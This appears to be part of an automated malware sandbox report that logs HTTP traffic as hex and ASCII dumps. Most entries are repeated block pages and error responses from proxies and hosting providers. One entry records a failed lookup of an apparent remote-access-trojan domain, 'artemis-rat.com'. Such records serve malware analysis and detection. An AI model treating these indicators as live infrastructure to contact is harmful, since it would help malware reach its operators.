                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:57 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:57 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 33 34 39 39 32 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:34992->1.1.1.1:53: i/o timeout
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:57 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 33 34 39 39 32 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:34992->1.1.1.1:53: i/o timeout
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:57 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=a6a30c38-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:15:00 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta 